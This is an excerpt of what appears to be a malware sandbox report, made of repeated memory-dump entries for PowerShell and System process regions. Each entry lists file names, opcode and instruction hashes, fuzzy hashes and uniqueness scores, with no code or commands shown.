                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d9fefb19aeb5eb094c55b4cbe263c4874dbf0ef63ec4a1ac2531c077f6997c8
                                                          • Instruction ID: 02354346533f810f6ca626d65f51528647b2bd9b0eea179f40f3a72f361c09b5

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0daff3761bdc0b0ad0c191c992086ef4d3c89c7b37e8015649238e62f6c4456
                                                          • Instruction ID: c50439f80b4a298e38a1937518eb7bb657701d665c1a6dca724e367c9a2249c4

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7181cc348d82d05ff9f9793c620a5458866dfe9fc193ce3f27f597d144b8d67
                                                          • Instruction ID: 43179e3d551f411151b66d6609727047d7e2f9cd474d643c8218041e856ebb9b

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515901735.00007FF9F0A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F0A80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f0a80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8aa38f379f597080772808474df0063a3fec606d0691afb4f2d7886dd741e5c6
                                                          • Instruction ID: c102fb3bf70700f3355af26b147df5f94ccb28076cfb77532d12ffbc1544969d

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e2ee69d3415aa05544501e250f7913b678403cfee99a46339cdd1b702b76f30
                                                          • Instruction ID: bf10b5433a2d16edf9e8b0377a27b380b46a1eb34b57c3c796444d7ee161e175

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2a9e2e34290e51b2724671ffcf24d46d0232c9ced2195fd65998a41f651ff7e
                                                          • Instruction ID: 19b81064ae046ae0f862dc8b5d6f3e63638d5192232d6209ba5136afd32270d4

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5363ce50b1888ee54a20fc219065d1f3fb997513670c0d70f2d6945cfafd896e
                                                          • Instruction ID: ef816330afbc05a51729e48fb1ec607fdebcebe0526f81a0f8f05fdf50868c60

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.515661429.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_7ff9f09b0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d842a9b538cc004dc8e24ddb2f65620f8eaf3267e0995968f707f9b85ccf366c
                                                          • Instruction ID: 75d3182837d4ba804926dc8724386c13ba13fe63f8f3b2ffa2e297c7961a4040

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d05826d53632d14c10d5fa8f58377986950276846c78f691a770574ba92db9b
                                                          • Instruction ID: c8201b8b4943e365605d34319203f1b148e2906c07e5ebd9598388a01fca088d

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb7b4a68d546cc6d09eeffc143ce19e2e7baaf38c20538c447ec71adc56005f
                                                          • Instruction ID: 4ca48f9935409bbeac7f14b487d20c442811edbe4680101a045f9dae01949b83

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e154f6f4a294c96985bb5b089abfb661cd32460d85f6237804dcc7a011460ab
                                                          • Instruction ID: 6fd1f70e59dbb367652b8e9c3871b4a97a98947dcb96ea040a3e57630e4cc94d
                                                          • Opcode Fuzzy Hash: 7e154f6f4a294c96985bb5b089abfb661cd32460d85f6237804dcc7a011460ab
                                                          • Instruction Fuzzy Hash: 2E812522E0CA8A4FE756FB7844512A1FB91FF56310F0882BAD1AEC76E3FD58B4458351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d37bcc58059f09c69933a493c15359531216d255048b7842338c5a9710dcc256
                                                          • Instruction ID: 06fce532a66a3466e3cf269cea4885aa05906e14063ce993d73c4e8d648087a8
                                                          • Opcode Fuzzy Hash: d37bcc58059f09c69933a493c15359531216d255048b7842338c5a9710dcc256
                                                          • Instruction Fuzzy Hash: AB615070B1C9098FDB48EB6CD459AA977E1FF99311B05417AE40DC73B6EE24EC828741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 021d377b02dd687f2e679f77b3b0534ac26e399d555bc515840005da1c28f24a
                                                          • Instruction ID: 872f21b0df79388c4cbd0da5cafcddfd066255837c512af749236cc104a952d4
                                                          • Opcode Fuzzy Hash: 021d377b02dd687f2e679f77b3b0534ac26e399d555bc515840005da1c28f24a
                                                          • Instruction Fuzzy Hash: 1661F122E0CA4A4BE769FB7884556F2E781FF65310F04827AD16EC36E3FE68B4418750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a192b7f87c7f037cb1b6961c777dada8b8808af9bdc46acc2e868e9b5133a21
                                                          • Instruction ID: 6a93ca93598b1176d31268398b671e0293496824f103a1be16b1efe7ecbbe252
                                                          • Opcode Fuzzy Hash: 8a192b7f87c7f037cb1b6961c777dada8b8808af9bdc46acc2e868e9b5133a21
                                                          • Instruction Fuzzy Hash: D0418231B189098FDB88EF5CD459AA977E1FF99311B05407AE54EC73A2DE64EC428B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22645d2d0b16707f7967a6a08681d4b2d7d3ab44e00e4f56c04236ca3aef1ff7
                                                          • Instruction ID: 27141db1bd7e489948f07d66db6a1fe9b01e340235e29d26a14838e08a158ee9
                                                          • Opcode Fuzzy Hash: 22645d2d0b16707f7967a6a08681d4b2d7d3ab44e00e4f56c04236ca3aef1ff7
                                                          • Instruction Fuzzy Hash: 8251D621A0D7C64FD31BD73888642647FB5EF63314B2986FBC196CB2E3D5586886C352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34b4373697d17056636127cb452ed2de8a52d6e2be3210568afc5bd94a13fd21
                                                          • Instruction ID: d02ff45e859f6fa24498958854e666590cf7bb1453ba9422f2e184d2575e1de7
                                                          • Opcode Fuzzy Hash: 34b4373697d17056636127cb452ed2de8a52d6e2be3210568afc5bd94a13fd21
                                                          • Instruction Fuzzy Hash: 074149A280E3C54FD30B8B749C666913FB5EF13214B1A82EBD485CB1F3E5586D4AC762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5367e29db2958b205bfd51dd6754d5f1cf4fcc8a709b62df83575d1f5c51d912
                                                          • Instruction ID: 2d74c8ba5828502f03e817d47d53bb7d72c1b5081ab249be132f76078ee21a98
                                                          • Opcode Fuzzy Hash: 5367e29db2958b205bfd51dd6754d5f1cf4fcc8a709b62df83575d1f5c51d912
                                                          • Instruction Fuzzy Hash: 6211E23260C50D1FA72CD92C9C0A5B7B3DAE7C6220B51933EE597C26A6EDA1A85342C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f429a248be3acaebccf32697224ba1f9e327e8fdf64e62e8ca649aa55021caa
                                                          • Instruction ID: 4ad80c0b058144ef84e7edcc968253f8d8062acdc7aa87b16be5e128bd4dfa4e
                                                          • Opcode Fuzzy Hash: 5f429a248be3acaebccf32697224ba1f9e327e8fdf64e62e8ca649aa55021caa
                                                          • Instruction Fuzzy Hash: FF314A6280E3C24FD30B872488625A67FB0AF13214B2A85EFD1D6CF5F3D518694AC362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8660487e2ee796a542ddb92ca4ab073345c14e52811f8816abfc6cec59ff033
                                                          • Instruction ID: 427d402bf60fb50e7696fa4f8837e9712c138fb7be55c554279dfd2168dda4fa
                                                          • Opcode Fuzzy Hash: e8660487e2ee796a542ddb92ca4ab073345c14e52811f8816abfc6cec59ff033
                                                          • Instruction Fuzzy Hash: 52318F3094E7C64FD317A77448212507FB1AF87314B1984EBD099CB6F3E659688AC322
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30696f5a388100177fa78a3c8cee6bd2f183afb52597b670da0b11ec8cac858e
                                                          • Instruction ID: d00cf21e760b62f794089b8594e1bed5d59305669decc44319be27d1373af0ed
                                                          • Opcode Fuzzy Hash: 30696f5a388100177fa78a3c8cee6bd2f183afb52597b670da0b11ec8cac858e
                                                          • Instruction Fuzzy Hash: E821486240E7C25FE30387348C62192BFB0AF23214B1E85EBD1D5CB5F3D5186A5AC762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dafe4d07e92e421eab5092160cea7c4349759f12817debd30753957e7a0c25ed
                                                          • Instruction ID: 550245507e290c9fb8ea69b34fe7b10ee59944764914498261ace46ff62238e9
                                                          • Opcode Fuzzy Hash: dafe4d07e92e421eab5092160cea7c4349759f12817debd30753957e7a0c25ed
                                                          • Instruction Fuzzy Hash: 9501F932A0C50D1B972C9D798C19577B79AD386610B12833EE597D27E6ED60A80302C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2281629fabbd9fc32d82594080871a40c8e81f4854022eca178d17179a37046f
                                                          • Instruction ID: fcfa61da6a5048bfeec0380d44b75842d2c10f1055d9cf9b90f3f80936c71e76
                                                          • Opcode Fuzzy Hash: 2281629fabbd9fc32d82594080871a40c8e81f4854022eca178d17179a37046f
                                                          • Instruction Fuzzy Hash: 0901F27260C1091FA31CE869AC4F8B2738DE382330761923EE597C26B6FC65BC5342C4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 108a0fe68feaeca25953e31abf7284eaf16d8cbb8d09f3518085484087146cd4
                                                          • Instruction ID: 0533927107789930f07e5641c476a990eb9d45d28989022dc8e819657f8ddcdc
                                                          • Opcode Fuzzy Hash: 108a0fe68feaeca25953e31abf7284eaf16d8cbb8d09f3518085484087146cd4
                                                          • Instruction Fuzzy Hash: 4411463154EBC14FD347977898212907FB1AF87224B1E44EBC494CF6F3D6A9698AC722
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9aa5d3eabd61510baa6e419bb600651aa97bd93004a43552114e5ce0351acd6e
                                                          • Instruction ID: eca2da86de8d21517be584b7b684d7351335e8407fb4e687e6900247820de1be
                                                          • Opcode Fuzzy Hash: 9aa5d3eabd61510baa6e419bb600651aa97bd93004a43552114e5ce0351acd6e
                                                          • Instruction Fuzzy Hash: 8011BE31D0D2898FDB16DB24D8506ED7BB1EF86310F0441FBD568DB2E2EA7829488B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39fa814631cf8dc546b69a611191ae924c9971be28a059fd1043ce6b23bfd5e2
                                                          • Instruction ID: 3d06036b56bc63fde0234de06533a67c2890e5f81bc9d49cf99aafda4ab75a4a
                                                          • Opcode Fuzzy Hash: 39fa814631cf8dc546b69a611191ae924c9971be28a059fd1043ce6b23bfd5e2
                                                          • Instruction Fuzzy Hash: 681152306187018FD30CDF18C495966B7E1FB98755B20956DE5CBC77A5CA34F982CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 539d884ab7eb0b88eec06936c63017b7cd9378dcf767f16a7088dc8abe5251bf
                                                          • Instruction ID: 996d4b2145847de1864caf95354a5cf00730761dbe0ba5315e70ce8907e0a517
                                                          • Opcode Fuzzy Hash: 539d884ab7eb0b88eec06936c63017b7cd9378dcf767f16a7088dc8abe5251bf
                                                          • Instruction Fuzzy Hash: 7211043190DAC60FD306CB348C356A67FA5EF53300B0982AFC081CB6E3DA546845C352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a291aaa35456841a2d4cb73f5045f62346c50f39ecf9e84c91137a359cd11af4
                                                          • Instruction ID: 410104a5c2d8061d3c734b42a3887ddfddacdf60d8fcb2466a3a51748c23305f
                                                          • Opcode Fuzzy Hash: a291aaa35456841a2d4cb73f5045f62346c50f39ecf9e84c91137a359cd11af4
                                                          • Instruction Fuzzy Hash: 0201F132F0C8074FE7A9EAA894252F863D6FB893507008179C51ECB2E6ED586C464380
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0eba432cbadb6fc79f9981090ebd1784ecdfcb82c34f49d50473e4341e109761
                                                          • Instruction ID: c1b436cf26536f247666f7bc412288cca0928b0e62723276d999e8cce807873b
                                                          • Opcode Fuzzy Hash: 0eba432cbadb6fc79f9981090ebd1784ecdfcb82c34f49d50473e4341e109761
                                                          • Instruction Fuzzy Hash: 3FF0BB22B1C9064BD74CE96CA5671BA33C9E7CD310754823FD94BC73E6FC54E9420680
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8df4662df5e067fe90cfe0c3830ca83349b92fe57658c52074be08f612f0208
                                                          • Instruction ID: 16a747d996e117047ec0887c63615049d21d37b7942b67f84d19ab5a02b83f0a
                                                          • Opcode Fuzzy Hash: d8df4662df5e067fe90cfe0c3830ca83349b92fe57658c52074be08f612f0208
                                                          • Instruction Fuzzy Hash: 4AF0FF30B182074B830CEE2C8A05175B39AEB85705B20927DE59BC73F6DD74E8428688
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4cabb24f48d26a74494fc940c1f9263cf47f2c1dadcd3c7c5f436225b9b2af0
                                                          • Instruction ID: d0450937d39c45ce43624534a12a65a9adcb84241ef7173f4219a65d832628e6
                                                          • Opcode Fuzzy Hash: f4cabb24f48d26a74494fc940c1f9263cf47f2c1dadcd3c7c5f436225b9b2af0
                                                          • Instruction Fuzzy Hash: CA114B74E186298FDBA5DF18C890BE8B7B1BB58301F5080E9D54DE73A1DB30AE849F00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ac837d14fa73a7a09cb555884652a67897afd5e4693198c92e338b445ed58f4
                                                          • Instruction ID: ec2d0354b1114fdee6d2464a0ac4ad422ab3f5ffeb9224d2dab8a12d94133232
                                                          • Opcode Fuzzy Hash: 9ac837d14fa73a7a09cb555884652a67897afd5e4693198c92e338b445ed58f4
                                                          • Instruction Fuzzy Hash: F601DB70D1861E8EEB94EB688C457E9B7F1FF99301F4081F6D00DD3296EE7569808B41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 452625d39cfd2bed51022209203b80b84e8c8a8e9180929320a5215ae5681e45
                                                          • Instruction ID: 84530137c8131645398855779c1168c3921c619f2d1a1dc534c3364ae7dd9733
                                                          • Opcode Fuzzy Hash: 452625d39cfd2bed51022209203b80b84e8c8a8e9180929320a5215ae5681e45
                                                          • Instruction Fuzzy Hash: B401DF3090EBC24BE35A933848142607FA5AF86360B0844FAC498CF7F3D8A8A881C321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cc453d4f2408572722d87e63793f5abb9436067e96f1631a8e3467c376bdbc9
                                                          • Instruction ID: 660a120a583c996253a75af52ca5861f78e5182ada784930fc7e97df2863998e
                                                          • Opcode Fuzzy Hash: 4cc453d4f2408572722d87e63793f5abb9436067e96f1631a8e3467c376bdbc9
                                                          • Instruction Fuzzy Hash: 6FF0B4B360C60A4B970CBA44E8571F873C9E756331B20513FCB9BC26A2FD1A605305C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b2354ffdfaee65e7eaae6f36d4b989356d36f726f51c80b6ebb85ec90129019
                                                          • Instruction ID: 8d3b0552dd83aef4d23735a5e90be360e5816c73cccdc4b7a793f74e171b1ff4
                                                          • Opcode Fuzzy Hash: 7b2354ffdfaee65e7eaae6f36d4b989356d36f726f51c80b6ebb85ec90129019
                                                          • Instruction Fuzzy Hash: 5EF0A431A0C50A4BDB0DBB6480666F9B39AFB65300F10D13ED96FC36E7EEA8B54541C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7896ee89cf0c54abe5ff0d46610568f38fb364f62d645aef931a6f835ec92db5
                                                          • Instruction ID: 35c89dd79f859e5a9ccd13d5ab8fad06cdc1dbd78436eff052ced06cd6e1a9a2
                                                          • Opcode Fuzzy Hash: 7896ee89cf0c54abe5ff0d46610568f38fb364f62d645aef931a6f835ec92db5
                                                          • Instruction Fuzzy Hash: E4F05932B0480A0BC758D528CC599BB77DADBD9321750833FC116C7BE4EDA568818380
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3da006cf34a921863fc791c812f1c61fdeff3f1400a2cd3453725c372e5bd2e
                                                          • Instruction ID: 3e38177b2713a9880549d8eee2c8b12de369f32b022d728e99cdc44331ca4ee5
                                                          • Opcode Fuzzy Hash: b3da006cf34a921863fc791c812f1c61fdeff3f1400a2cd3453725c372e5bd2e
                                                          • Instruction Fuzzy Hash: 63F0A471A6C7818FC358DB5C4052126B7E1FB9A700F00957DF28A83391E764A8418F87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
